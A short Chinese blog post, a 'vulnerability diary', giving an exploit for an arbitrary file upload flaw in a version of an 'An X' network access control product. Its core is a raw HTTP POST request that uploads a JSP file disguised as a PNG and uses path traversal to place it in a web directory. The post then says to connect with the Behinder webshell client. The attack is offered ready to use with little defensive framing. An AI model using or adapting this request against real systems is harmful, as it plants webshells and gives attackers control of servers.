【漏洞日记】某版本安X(某软)任意文件上传漏洞EXP(某软准入)


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


目录

某软准入是啥样?

安X任意文件上传漏洞EXP(某软准入)


某软准入是啥样?

【漏洞日记】某版本安X(某软)任意文件上传漏洞EXP(某软准入)

 

安X任意文件上传漏洞EXP(某软准入)

POST /uai/download/uploadfileToPath.htm HTTP/1.1
HOST: xxxxx
... ...

-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"
Content-Type: image/png



-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="uploadpath"

../webapps/notifymsg/devreport/
-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

【漏洞日记】某版本安X(某软)任意文件上传漏洞EXP(某软准入)

冰蝎直接连

【漏洞日记】某版本安X(某软)任意文件上传漏洞EXP(某软准入)


虽然我们生活在阴沟里,但依然有人仰望星空!


 

本文由 @陈奕天[Vip] 发布于 职涯宝 ,未经作者许可,禁止转载,欢迎您分享文章

发表评论

登录后才能评论
小程序
小程序
微信客服
微信客服
QQ客服 建站服务
分享本页
返回顶部